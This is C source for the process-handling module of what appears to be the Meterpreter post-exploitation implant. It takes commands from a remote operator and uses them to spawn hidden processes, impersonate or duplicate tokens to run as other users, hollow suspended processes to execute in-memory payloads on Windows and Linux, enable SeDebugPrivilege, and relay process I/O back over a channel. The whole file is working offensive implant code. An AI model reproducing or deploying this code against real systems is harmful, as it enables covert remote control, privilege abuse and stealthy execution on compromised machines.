#include "precomp.h"
#include "ps.h" // include the code for listing proceses
#ifdef _WIN32
#include "./../session.h"
#include "in-mem-exe.h" /* include skapetastic in-mem exe exec */
typedef BOOL (STDMETHODCALLTYPE FAR * LPFNCREATEENVIRONMENTBLOCK)( LPVOID *lpEnvironment, HANDLE hToken, BOOL bInherit );
typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment );
typedef BOOL (WINAPI * LPCREATEPROCESSWITHTOKENW)( HANDLE, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION );
#else
#include "linux-in-mem-exe.h"
#endif
/*
* Attaches to the supplied process identifier. If no process identifier is
* supplied, the handle for the current process is returned to the requestor.
*
* req: TLV_TYPE_PID - The process to attach to.
*/
DWORD request_sys_process_attach(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
#ifdef _WIN32
HANDLE handle = NULL;
DWORD result = ERROR_SUCCESS;
DWORD pid;
// Get the process identifier that we're attaching to, if any.
pid = packet_get_tlv_value_uint(packet, TLV_TYPE_PID);
// No pid? Use current.
if (!pid)
handle = GetCurrentProcess();
// Otherwise, attach.
else
{
BOOLEAN inherit = packet_get_tlv_value_bool(packet, TLV_TYPE_INHERIT);
DWORD permission = packet_get_tlv_value_uint(packet, TLV_TYPE_PROCESS_PERMS);
handle = OpenProcess(permission, inherit, pid);
}
// If we have a handle, add it to the response
if (handle)
packet_add_tlv_qword(response, TLV_TYPE_HANDLE, (QWORD)handle);
else
result = GetLastError();
#else
DWORD result = ERROR_NOT_SUPPORTED;
#endif
// Send the response packet to the requestor
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
/*
* Closes a handle that was opened via the attach method
*
* req: TLV_TYPE_HANDLE - The process handle to close.
*/
DWORD request_sys_process_close(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
HANDLE handle;
DWORD result = ERROR_SUCCESS;
handle = (HANDLE)packet_get_tlv_value_qword(packet, TLV_TYPE_HANDLE);
if (handle)
{
#ifdef _WIN32
if (handle != GetCurrentProcess())
CloseHandle(handle);
#else
// XXX ... not entirely sure this ports across.
#endif
}
else
result = ERROR_INVALID_PARAMETER;
// Send the response packet to the requestor
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
#ifndef _WIN32
int try_open_pty(int *master, int *slave)
{
int lmaster, lslave;
char path[512];
struct termios newtio;
lmaster = open("/dev/ptmx", O_RDWR | O_NOCTTY);
if(lmaster == -1) return -1;
dprintf("master fd is %d", lmaster);
if(grantpt(lmaster) == -1) {
close(lmaster);
return -1;
}
if(unlockpt(lmaster) == -1) {
close(lmaster);
return -1;
}
memset(path, 0, sizeof(path));
if(ptsname_r(lmaster, path, sizeof(path)-2) == -1) {
close(lmaster);
return -1;
}
lslave = open(path, O_RDWR | O_NOCTTY);
if(lslave == -1) {
close(lmaster);
return -1;
}
*master = lmaster;
*slave = lslave;
if(tcgetattr(lmaster, &newtio) == -1)
// oh well
return 0;
// man 3 termios for more information (under linux, at least).
newtio.c_lflag |= (ISIG|ICANON);
newtio.c_lflag &= ~ECHO;
// can't do anything about it if it fails
tcsetattr(lmaster, TCSANOW, &newtio);
return 0;
}
#endif
/*
* Executes a process using the supplied parameters, optionally creating a
* channel through which output is filtered.
*
* req: TLV_TYPE_PROCESS_PATH - The executable to launch
* req: TLV_TYPE_PROCESS_ARGUMENTS - The arguments to pass
* req: TLV_TYPE_FLAGS - The flags to execute with
*/
DWORD request_sys_process_execute(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
DWORD result = ERROR_SUCCESS;
Tlv inMemoryData;
BOOL doInMemory = FALSE;
#ifdef _WIN32
PROCESS_INFORMATION pi;
STARTUPINFO si;
HANDLE in[2], out[2];
PCHAR path, arguments, commandLine = NULL;
DWORD flags = 0, createFlags = 0;
BOOL inherit = FALSE;
HANDLE token, pToken;
char * cpDesktop = NULL;
DWORD session = 0;
LPVOID pEnvironment = NULL;
LPFNCREATEENVIRONMENTBLOCK lpfnCreateEnvironmentBlock = NULL;
LPFNDESTROYENVIRONMENTBLOCK lpfnDestroyEnvironmentBlock = NULL;
HMODULE hUserEnvLib = NULL;
ProcessChannelContext * ctx = NULL;
dprintf( "[PROCESS] request_sys_process_execute" );
// Initialize the startup information
memset( &pi, 0, sizeof(PROCESS_INFORMATION) );
memset( &si, 0, sizeof(STARTUPINFO) );
si.cb = sizeof(STARTUPINFO);
// Initialize pipe handles
in[0] = NULL;
in[1] = NULL;
out[0] = NULL;
out[1] = NULL;
do
{
// No response? We suck.
if (!response)
{
break;
}
// Get the execution arguments
arguments = packet_get_tlv_value_string(packet, TLV_TYPE_PROCESS_ARGUMENTS);
path = packet_get_tlv_value_string(packet, TLV_TYPE_PROCESS_PATH);
flags = packet_get_tlv_value_uint(packet, TLV_TYPE_PROCESS_FLAGS);
if (packet_get_tlv(packet, TLV_TYPE_VALUE_DATA, &inMemoryData) == ERROR_SUCCESS)
{
doInMemory = TRUE;
createFlags |= CREATE_SUSPENDED;
}
if (flags & PROCESS_EXECUTE_FLAG_DESKTOP)
{
do
{
cpDesktop = (char *)malloc(512);
if (!cpDesktop)
break;
memset(cpDesktop, 0, 512);
lock_acquire(remote->lock);
_snprintf(cpDesktop, 512, "%s\\%s", remote->curr_station_name, remote->curr_desktop_name);
lock_release(remote->lock);
si.lpDesktop = cpDesktop;
} while (0);
}
// If the remote endpoint provided arguments, combine them with the
// executable to produce a command line
if (path && arguments)
{
size_t commandLineLength = strlen(path) + strlen(arguments) + 2;
if (!(commandLine = (PCHAR)malloc(commandLineLength)))
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
_snprintf(commandLine, commandLineLength, "%s %s", path, arguments);
}
else if (path)
{
commandLine = path;
}
else
{
result = ERROR_INVALID_PARAMETER;
break;
}
// If the channelized flag is set, create a pipe for stdin/stdout/stderr
// such that input can be directed to and from the remote endpoint
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED)
{
SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };
PoolChannelOps chops;
Channel *newChannel;
// Allocate the channel context
if (!(ctx = (ProcessChannelContext *)malloc(sizeof(ProcessChannelContext))))
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
memset(&chops, 0, sizeof(PoolChannelOps));
// Initialize the channel operations
dprintf("[PROCESS] context address 0x%p", ctx);
chops.native.context = ctx;
chops.native.write = process_channel_write;
chops.native.close = process_channel_close;
chops.native.interact = process_channel_interact;
chops.read = process_channel_read;
// Allocate the pool channel
if (!(newChannel = channel_create_pool(0, CHANNEL_FLAG_SYNCHRONOUS, &chops)))
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
// Set the channel's type to process
channel_set_type(newChannel, "process");
// Allocate the stdin and stdout pipes
if ((!CreatePipe(&in[0], &in[1], &sa, 0)) || (!CreatePipe(&out[0], &out[1], &sa, 0)))
{
channel_destroy(newChannel, NULL);
newChannel = NULL;
free(ctx);
result = GetLastError();
break;
}
// Initialize the startup info to use the pipe handles
si.dwFlags |= STARTF_USESTDHANDLES;
si.hStdInput = in[0];
si.hStdOutput = out[1];
si.hStdError = out[1];
inherit = TRUE;
createFlags |= CREATE_NEW_CONSOLE;
// Set the context to have the write side of stdin and the read side
// of stdout
ctx->pStdin = in[1];
ctx->pStdout = out[0];
// Add the channel identifier to the response packet
packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(newChannel));
}
// If the hidden flag is set, create the process hidden
if (flags & PROCESS_EXECUTE_FLAG_HIDDEN)
{
si.dwFlags |= STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
createFlags |= CREATE_NO_WINDOW;
}
// Should we create the process suspended?
if (flags & PROCESS_EXECUTE_FLAG_SUSPENDED)
createFlags |= CREATE_SUSPENDED;
if (flags & PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN)
{
// If there is an impersonated token stored, use that one first, otherwise
// try to grab the current thread token, then the process token
if (remote->thread_token)
{
token = remote->thread_token;
dprintf("[execute] using thread impersonation token");
}
else if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token))
{
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token);
}
dprintf("[execute] token is 0x%.8x", token);
// Duplicate to make primary token (try delegation first)
if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken))
{
if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken))
{
result = GetLastError();
dprintf("[execute] failed to duplicate token 0x%.8x", result);
break;
}
}
hUserEnvLib = LoadLibrary("userenv.dll");
if (NULL != hUserEnvLib)
{
lpfnCreateEnvironmentBlock = (LPFNCREATEENVIRONMENTBLOCK)GetProcAddress(hUserEnvLib, "CreateEnvironmentBlock");
lpfnDestroyEnvironmentBlock = (LPFNDESTROYENVIRONMENTBLOCK)GetProcAddress(hUserEnvLib, "DestroyEnvironmentBlock");
if (lpfnCreateEnvironmentBlock && lpfnCreateEnvironmentBlock(&pEnvironment, pToken, FALSE))
{
createFlags |= CREATE_UNICODE_ENVIRONMENT;
dprintf("[execute] created a duplicated environment block");
}
else
{
pEnvironment = NULL;
}
}
// Try to execute the process with duplicated token
if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
{
LPCREATEPROCESSWITHTOKENW pCreateProcessWithTokenW = NULL;
HANDLE hAdvapi32 = NULL;
wchar_t * wcmdline = NULL;
wchar_t * wdesktop = NULL;
size_t size = 0;
result = GetLastError();
// sf: If we hit an ERROR_PRIVILEGE_NOT_HELD failure we can fall back to CreateProcessWithTokenW but this is only
// available on 2003/Vista/2008/7. CreateProcessAsUser() seems to be just borked on some systems IMHO.
if (result == ERROR_PRIVILEGE_NOT_HELD)
{
do
{
hAdvapi32 = LoadLibrary("advapi32.dll");
if (!hAdvapi32)
{
break;
}
pCreateProcessWithTokenW = (LPCREATEPROCESSWITHTOKENW)GetProcAddress(hAdvapi32, "CreateProcessWithTokenW");
if (!pCreateProcessWithTokenW)
{
break;
}
// convert the multibyte inputs to wide strings (No CreateProcessWithTokenA available unfortunatly)...
size = mbstowcs(NULL, commandLine, 0);
if (size == (size_t)-1)
{
break;
}
wcmdline = (wchar_t *)malloc((size + 1) * sizeof(wchar_t));
mbstowcs(wcmdline, commandLine, size);
if (si.lpDesktop)
{
size = mbstowcs(NULL, (char *)si.lpDesktop, 0);
if (size != (size_t)-1)
{
wdesktop = (wchar_t *)malloc((size + 1) * sizeof(wchar_t));
mbstowcs(wdesktop, (char *)si.lpDesktop, size);
si.lpDesktop = (LPSTR)wdesktop;
}
}
if (!pCreateProcessWithTokenW(pToken, LOGON_NETCREDENTIALS_ONLY, NULL, wcmdline, createFlags, pEnvironment, NULL, (LPSTARTUPINFOW)&si, &pi))
{
result = GetLastError();
dprintf("[execute] failed to create the new process via CreateProcessWithTokenW 0x%.8x", result);
break;
}
result = ERROR_SUCCESS;
} while (0);
if (hAdvapi32)
{
FreeLibrary(hAdvapi32);
}
SAFE_FREE(wdesktop);
SAFE_FREE(wcmdline);
}
else
{
dprintf("[execute] failed to create the new process via CreateProcessAsUser 0x%.8x", result);
break;
}
}
if (lpfnDestroyEnvironmentBlock && pEnvironment)
{
lpfnDestroyEnvironmentBlock(pEnvironment);
}
if (NULL != hUserEnvLib)
{
FreeLibrary(hUserEnvLib);
}
}
else if (flags & PROCESS_EXECUTE_FLAG_SESSION)
{
typedef BOOL(WINAPI * WTSQUERYUSERTOKEN)(ULONG SessionId, PHANDLE phToken);
WTSQUERYUSERTOKEN pWTSQueryUserToken = NULL;
HANDLE hToken = NULL;
HMODULE hWtsapi32 = NULL;
BOOL bSuccess = FALSE;
DWORD dwResult = ERROR_SUCCESS;
do
{
// Note: wtsapi32!WTSQueryUserToken is not available on NT4 or 2000 so we dynamically resolve it.
hWtsapi32 = LoadLibraryA("wtsapi32.dll");
session = packet_get_tlv_value_uint(packet, TLV_TYPE_PROCESS_SESSION);
if (session_id(GetCurrentProcessId()) == session || !hWtsapi32)
{
if (!CreateProcess(NULL, commandLine, NULL, NULL, inherit, createFlags, NULL, NULL, &si, &pi))
{
BREAK_ON_ERROR("[PROCESS] execute in self session: CreateProcess failed");
}
}
else
{
pWTSQueryUserToken = (WTSQUERYUSERTOKEN)GetProcAddress(hWtsapi32, "WTSQueryUserToken");
if (!pWTSQueryUserToken)
{
BREAK_ON_ERROR("[PROCESS] execute in session: GetProcAdress WTSQueryUserToken failed");
}
if (!pWTSQueryUserToken(session, &hToken))
{
BREAK_ON_ERROR("[PROCESS] execute in session: WTSQueryUserToken failed");
}
if (!CreateProcessAsUser(hToken, NULL, commandLine, NULL, NULL, inherit, createFlags, NULL, NULL, &si, &pi))
{
BREAK_ON_ERROR("[PROCESS] execute in session: CreateProcessAsUser failed");
}
}
} while (0);
if (hWtsapi32)
{
FreeLibrary(hWtsapi32);
}
if (hToken)
{
CloseHandle(hToken);
}
result = dwResult;
if (result != ERROR_SUCCESS)
{
break;
}
}
else
{
// Try to execute the process
if (!CreateProcess(NULL, commandLine, NULL, NULL, inherit, createFlags, NULL, NULL, &si, &pi))
{
result = GetLastError();
break;
}
}
//
// Do up the in memory exe execution if the user requested it
//
if (doInMemory)
{
//
// Unmap the dummy executable and map in the new executable into the
// target process
//
if (!MapNewExecutableRegionInProcess(pi.hProcess, pi.hThread, inMemoryData.buffer))
{
result = GetLastError();
break;
}
//
// Resume the thread and let it rock...
//
if (ResumeThread(pi.hThread) == (DWORD)-1)
{
result = GetLastError();
break;
}
}
// check for failure here otherwise we can get a case where we
// failed but return a process id and this will throw off the ruby side.
if (result == ERROR_SUCCESS)
{
// if we managed to successfully create a channelized process, we need to retain
// a handle to it so that we can shut it down externally if required.
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED
&& ctx != NULL)
{
dprintf("[PROCESS] started process 0x%x", pi.hProcess);
ctx->pProcess = pi.hProcess;
}
// Add the process identifier to the response packet
packet_add_tlv_uint(response, TLV_TYPE_PID, pi.dwProcessId);
packet_add_tlv_qword(response, TLV_TYPE_PROCESS_HANDLE, (QWORD)pi.hProcess);
CloseHandle(pi.hThread);
}
} while (0);
// Close the read side of stdin and the write side of stdout
if (in[0])
{
CloseHandle(in[0]);
}
if (out[1])
{
CloseHandle(out[1]);
}
// Free the command line if necessary
if (path && arguments && commandLine)
{
free(commandLine);
}
if( cpDesktop )
{
free( cpDesktop );
}
#else
PCHAR path, arguments;;
DWORD flags;
char *argv[8], *command_line;
int cl_len = 0;
int in[2] = { -1, -1 }, out[2] = {-1, -1}; // file descriptors
int master = -1, slave = -1;
int devnull = -1;
int idx, i;
pid_t pid;
int have_pty = -1;
ProcessChannelContext * ctx = NULL;
int hidden = (flags & PROCESS_EXECUTE_FLAG_HIDDEN);
dprintf( "[PROCESS] request_sys_process_execute" );
do {
// Get the execution arguments
arguments = packet_get_tlv_value_string(packet, TLV_TYPE_PROCESS_ARGUMENTS);
path = packet_get_tlv_value_string(packet, TLV_TYPE_PROCESS_PATH);
flags = packet_get_tlv_value_uint(packet, TLV_TYPE_PROCESS_FLAGS);
dprintf("path: %s, arguments: %s\n", path ? path : "(null)", arguments ? arguments : "(null)");
if (packet_get_tlv(packet, TLV_TYPE_VALUE_DATA, &inMemoryData) == ERROR_SUCCESS)
{
doInMemory = TRUE;
}
// how to handle a single string argument line? we don't have a lexer/parser to
// correctly handle stuff like quotes, etc. could dumbly parse on white space to
// build arguments for execve. revert to /bin/sh -c style execution?
// XXX.. don't feel like messing with it atm
idx = 0;
if(arguments) {
// Add one for the null, one for the space
cl_len = strlen(path) + strlen(arguments) + 2;
command_line = malloc(cl_len);
memset(command_line, 0, cl_len);
strcat(command_line, path);
strcat(command_line, " ");
strcat(command_line, arguments);
argv[idx++] = "sh";
argv[idx++] = "-c";
argv[idx++] = command_line;
path = "/bin/sh";
} else {
argv[idx++] = path;
}
argv[idx++] = NULL;
//for (i = 0; i < idx; i++) {
// dprintf(" argv[%d] = %s", i, argv[i]);
//}
// If the channelized flag is set, create a pipe for stdin/stdout/stderr
// such that input can be directed to and from the remote endpoint
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED)
{
PoolChannelOps chops;
Channel *newChannel;
// Allocate the channel context
if (!(ctx = (ProcessChannelContext *)malloc(sizeof(ProcessChannelContext))))
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
memset(&chops, 0, sizeof(PoolChannelOps));
// Initialize the channel operations
dprintf( "[PROCESS] context address 0x%p", ctx );
chops.native.context = ctx;
chops.native.write = process_channel_write;
chops.native.close = process_channel_close;
chops.native.interact = process_channel_interact;
chops.read = process_channel_read;
// Allocate the pool channel
if (!(newChannel = channel_create_pool(0, CHANNEL_FLAG_SYNCHRONOUS, &chops)))
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
// Set the channel's type to process
channel_set_type(newChannel, "process");
have_pty = !try_open_pty(&master, &slave);
if(have_pty)
{
ctx->pStdin = master;
ctx->pStdout = master;
} else {
// fall back to pipes if there is no tty
// Allocate the stdin and stdout pipes
if(pipe(&in) || pipe(&out))
{
channel_destroy(newChannel, NULL);
newChannel = NULL;
free(ctx);
result = GetLastError();
break;
}
// Set the context to have the write side of stdin and the read side
// of stdout
ctx->pStdin = in[1];
ctx->pStdout = out[0];
}
fcntl(ctx->pStdin, F_SETFD, fcntl(ctx->pStdin, F_GETFD) | O_NONBLOCK);
fcntl(ctx->pStdout, F_SETFD, fcntl(ctx->pStdout, F_GETFD) | O_NONBLOCK);
// Add the channel identifier to the response packet
packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID,channel_get_id(newChannel));
} else {
// need to /dev/null it all
if( (devnull = open("/dev/null", O_RDONLY) ) == -1) {
// XXX This is possible, due to chroots etc. We could close
// fd 0/1/2 and hope the program isn't buggy.
result = GetLastError();
break;
}
}
/*
* We can create "hidden" processes via clone() instead of fork()
* clone(child_stack, flags = CLONE_THREAD) should do the trick. Probably worth while as well.
* memory / fd's etc won't be shared. linux specific syscall though.
*/
pid = fork();
switch(pid) {
case -1:
result = errno;
break;
case 0:
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED)
{
if(have_pty)
{
dup2(slave, 0);
dup2(slave, 1);
dup2(slave, 2);
} else {
dup2(in[0], 0);
dup2(out[1], 1);
dup2(out[1], 2);
}
} else {
dup2(devnull, 0);
dup2(devnull, 1);
dup2(devnull, 2);
}
for(i = 3; i < 1024; i++) close(i);
if(doInMemory)
{
int found;
Elf32_Ehdr *ehdr = (Elf32_Ehdr *)inMemoryData.buffer;
Elf32_Phdr *phdr = (Elf32_Phdr *)(inMemoryData.buffer + ehdr->e_phoff);
for(found = 0, i = 0; i < ehdr->e_phnum; i++, phdr++) {
if(phdr->p_type == PT_LOAD) {
found = 1;
break;
}
}
if(! found) return; // XXX, not too much we can do in this case ?
perform_in_mem_exe(argv, environ, inMemoryData.buffer, inMemoryData.header.length, phdr->p_vaddr & ~4095, ehdr->e_entry);
} else {
execve(path, argv, environ);
}
dprintf("failed to execute program, exit(EXIT_FAILURE) time");
dprintf("doInMemory = %d, hidden = %d", doInMemory, hidden);
exit(EXIT_FAILURE);
default:
dprintf("child pid is %d\n", pid);
packet_add_tlv_uint(response, TLV_TYPE_PID, (DWORD)pid);
packet_add_tlv_qword(response, TLV_TYPE_PROCESS_HANDLE, (QWORD)pid);
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) {
if(have_pty) {
dprintf("child channelized\n");
close(slave);
ctx->pProcess = (HANDLE)pid;
} else {
close(in[0]);
close(out[1]);
close(out[2]);
}
}
break;
}
} while(0);
#endif
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
/*
* Kills one or more supplied processes
*
* req: TLV_TYPE_PID [n]
*/
DWORD request_sys_process_kill(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
DWORD result = ERROR_SUCCESS;
Tlv pidTlv;
DWORD index = 0;
while ((packet_enum_tlv(packet, index++, TLV_TYPE_PID,
&pidTlv) == ERROR_SUCCESS) &&
(pidTlv.header.length >= sizeof(DWORD)))
{
DWORD pid = ntohl(*(LPDWORD)pidTlv.buffer);
HANDLE h = NULL;
#ifdef _WIN32
// Try to attach to the process
if (!(h = OpenProcess(PROCESS_TERMINATE, FALSE, pid)))
{
result = GetLastError();
break;
}
if (!TerminateProcess(h, 0))
result = GetLastError();
CloseHandle(h);
#else
kill(pid, 9);
#endif
}
// Transmit the response
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
/*
* Gets the list of active processes (including their PID, name, user, arch and path)
* and sends the information back to the requestor. See ps.c for the guts of this.
*/
DWORD request_sys_process_get_processes( Remote * remote, Packet * packet )
{
#ifdef _WIN32
Packet * response = NULL;
HANDLE hToken = NULL;
DWORD result = ERROR_SUCCESS;
do
{
response = packet_create_response( packet );
if( !response )
break;
// If we can, get SeDebugPrivilege...
if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES priv = {0};
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );
CloseHandle( hToken );
}
// First we will try to get a process list via the toolhelp API. This method gives us the most information
// on all processes, including processes we cant actually open and all x64/x86 processes on x64 systems.
// However NT4 does not have the toolhelp API (but Win98 did!?!).
result = ps_list_via_toolhelp( response );
if( result != ERROR_SUCCESS )
{
// Second attempt is to use the PSAPI functions which may work on NT4 if the PSAPI patch has been applied.
result = ps_list_via_psapi( response );
if( result != ERROR_SUCCESS )
{
// Third method is to brute force the process list (and extract info from PEB) if all other methods have failed.
result = ps_list_via_brute( response );
}
}
packet_transmit_response( result, remote, response );
} while( 0 );
#else
DWORD result = ERROR_NOT_SUPPORTED;
Packet * response = packet_create_response( packet );
if (response) {
result = ps_list_linux( response );
packet_transmit_response( result, remote, response );
}
#endif
return result;
}
/*
* Handles the getpid request
*/
DWORD request_sys_process_getpid(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
#ifdef _WIN32
packet_add_tlv_uint(response, TLV_TYPE_PID, GetCurrentProcessId());
#else
packet_add_tlv_uint(response, TLV_TYPE_PID, getpid());
#endif
packet_transmit_response(ERROR_SUCCESS, remote, response);
return ERROR_SUCCESS;
}
/*
* Returns information about the supplied process handle.
*
* req: TLV_TYPE_HANDLE - The handle to gather information from.
*/
DWORD request_sys_process_get_info(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
#ifdef _WIN32
BOOL (WINAPI *enumProcessModules)(HANDLE p, HMODULE *mod, DWORD cb,
LPDWORD needed);
DWORD (WINAPI *getModuleBaseName)(HANDLE p, HMODULE mod, LPTSTR base,
DWORD baseSize);
DWORD (WINAPI *getModuleFileNameEx)(HANDLE p, HMODULE mod, LPTSTR path,
DWORD pathSize);
HMODULE mod;
HANDLE psapi = NULL;
HANDLE handle;
DWORD result = ERROR_SUCCESS;
DWORD needed;
CHAR path[1024], name[256];
handle = (HANDLE)packet_get_tlv_value_qword(packet, TLV_TYPE_HANDLE);
do
{
// Valid response?
if (!response)
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
// Valid parameters?
if (!handle)
{
result = ERROR_INVALID_PARAMETER;
break;
}
// Open the process API
if (!(psapi = LoadLibrary("psapi")))
{
result = GetLastError();
break;
}
// Try to resolve the necessary symbols
if ((!((LPVOID)enumProcessModules =
(LPVOID)GetProcAddress(psapi, "EnumProcessModules"))) ||
(!((LPVOID)getModuleBaseName =
(LPVOID)GetProcAddress(psapi, "GetModuleBaseNameA"))) ||
(!((LPVOID)getModuleFileNameEx =
(LPVOID)GetProcAddress(psapi, "GetModuleFileNameExA"))))
{
result = GetLastError();
break;
}
memset(name, 0, sizeof(name));
memset(path, 0, sizeof(path));
// Enumerate the first module in the process and get its base name
if ((!enumProcessModules(handle, &mod, sizeof(mod), &needed) ||
(getModuleBaseName(handle, mod, name, sizeof(name) - 1) == 0)))
{
result = GetLastError();
break;
}
// Try to get the process' file name
getModuleFileNameEx(handle, mod, path, sizeof(path) - 1);
// Set the process' information on the response
packet_add_tlv_string(response, TLV_TYPE_PROCESS_NAME, name);
packet_add_tlv_string(response, TLV_TYPE_PROCESS_PATH, path);
} while (0);
// Transmit the response
packet_transmit_response(ERROR_SUCCESS, remote, response);
// Close the psapi library and clean up
if (psapi)
FreeLibrary(psapi);
#else
packet_transmit_response(ERROR_NOT_SUPPORTED, remote, response);
#endif
return ERROR_SUCCESS;
}
/************************
* Process DIO handlers *
************************/
/*
* Reads directly from the output handle of the process
*
* FIXME: can-block
*/
DWORD process_channel_read(Channel *channel, Packet *request,
LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesRead)
{
DWORD result = ERROR_SUCCESS;
ProcessChannelContext *ctx = (ProcessChannelContext *)context;
dprintf("[PROCESS] process_channel_read. channel=0x%08X, ctx=0x%08X", channel, ctx);
if (ctx == NULL)
{
return result;
}
#ifdef _WIN32
if (!ReadFile(ctx->pStdout, buffer, bufferSize, bytesRead, NULL))
result = GetLastError();
#else
if ( (*bytesRead = read( ctx->pStdout, buffer, bufferSize )) < 0 ) {
result = GetLastError();
// Always return zero bytes read on error
*bytesRead = 0;
}
#endif
return result;
}
/*
* Writes data from the remote half of the channel to the process's standard
* input handle
*/
DWORD process_channel_write( Channel *channel, Packet *request,
LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten )
{
ProcessChannelContext *ctx = (ProcessChannelContext *)context;
DWORD result = ERROR_SUCCESS;
dprintf( "[PROCESS] process_channel_write. channel=0x%08X, ctx=0x%08X", channel, ctx );
if (ctx == NULL)
{
return result;
}
#ifdef _WIN32
if ( !WriteFile( ctx->pStdin, buffer, bufferSize, bytesWritten, NULL ) )
result = GetLastError();
#else
if( (*bytesWritten = write( ctx->pStdin, buffer, bufferSize )) < 0 ) {
result = GetLastError();
}
#endif
return result;
}
/*
* Closes the channels that were opened to the process.
*/
DWORD process_channel_close( Channel *channel, Packet *request, LPVOID context )
{
DWORD result = ERROR_SUCCESS;
ProcessChannelContext *ctx = (ProcessChannelContext *)context;
dprintf( "[PROCESS] process_channel_close. channel=0x%08X, ctx=0x%08X", channel, ctx );
if (ctx == NULL)
{
return result;
}
if ( ctx->pProcess != NULL ) {
dprintf( "[PROCESS] channel has an attached process, closing via scheduler signal. channel=0x%08X, ctx=0x%08X", channel, ctx );
scheduler_signal_waitable( ctx->pStdout, Stop );
} else {
#ifdef _WIN32
CloseHandle( ctx->pStdin );
CloseHandle( ctx->pStdout );
#else
close( ctx->pStdin );
close( ctx->pStdout );
#endif
free( ctx );
}
return result;
}
DWORD process_channel_interact_destroy( HANDLE waitable, LPVOID entryContext, LPVOID threadContext )
{
ProcessChannelContext *ctx = (ProcessChannelContext *)threadContext;
DWORD dwResult = ERROR_SUCCESS;
Channel *channel = (Channel *)entryContext;
dprintf( "[PROCESS] terminating context 0x%p", ctx );
if (ctx == NULL)
{
return dwResult;
}
#ifdef _WIN32
CloseHandle( ctx->pStdin );
CloseHandle( ctx->pStdout );
if( ctx->pProcess ) {
dprintf( "[PROCESS] terminating process 0x%x", ctx->pProcess );
TerminateProcess( ctx->pProcess, 0 );
}
#else
close( ctx->pStdin );
close( ctx->pStdout );
dprintf( "[PROCESS] pid %u", ctx->pProcess );
if( ctx->pProcess ) {
dprintf( "[PROCESS] terminating pid %u", ctx->pProcess );
kill( (pid_t)ctx->pProcess, 9 );
}
#endif
free( ctx );
if (channel_exists(channel))
{
channel->ops.pool.native.context = NULL;
}
return dwResult;
}
/*
* Callback for when data is available on the standard output handle of
* a process channel that is interactive mode
*/
DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOID threadContext)
{
Channel *channel = (Channel*)entryContext;
ProcessChannelContext *ctx = (ProcessChannelContext *)threadContext;
DWORD bytesRead, bytesAvail = 0;
CHAR buffer[16384];
DWORD result = ERROR_SUCCESS;
if (!channel_exists(channel) || ctx == NULL)
{
return result;
}
#ifdef _WIN32
if( PeekNamedPipe( ctx->pStdout, NULL, 0, NULL, &bytesAvail, NULL ) )
{
if( bytesAvail )
{
if( ReadFile( ctx->pStdout, buffer, sizeof(buffer) - 1, &bytesRead, NULL ) )
{
return channel_write( channel, remote, NULL, 0, buffer, bytesRead, NULL );
}
result = GetLastError();
}
else
{
// sf: if no data is available on the pipe we sleep to avoid running a tight loop
// in this thread, as anonymous pipes won't block for data to arrive.
Sleep( 100 );
}
}
else
{
result = GetLastError();
}
#else
bytesRead = read ( ctx->pStdout, buffer, sizeof(buffer) - 1);
if ( bytesRead > 0 )
{
dprintf("bytesRead: %d, errno: %d", bytesRead, errno);
result = channel_write ( channel, remote, NULL, 0, buffer, bytesRead, NULL );
}
if(bytesRead == -1) {
if(errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN) {
errno = ERROR_SUCCESS;
}
}
if(bytesRead == 0) {
errno = ECONNRESET;
}
if(bytesRead <= 0) result = errno;
#endif
if( result != ERROR_SUCCESS )
{
dprintf("Closing down socket: result: %d\n", result);
process_channel_close( channel, NULL, ctx );
channel_close( channel, remote, NULL, 0, NULL );
}
return result;
}
/*
* Enables or disables interactivity with the standard output handle on the channel
*/
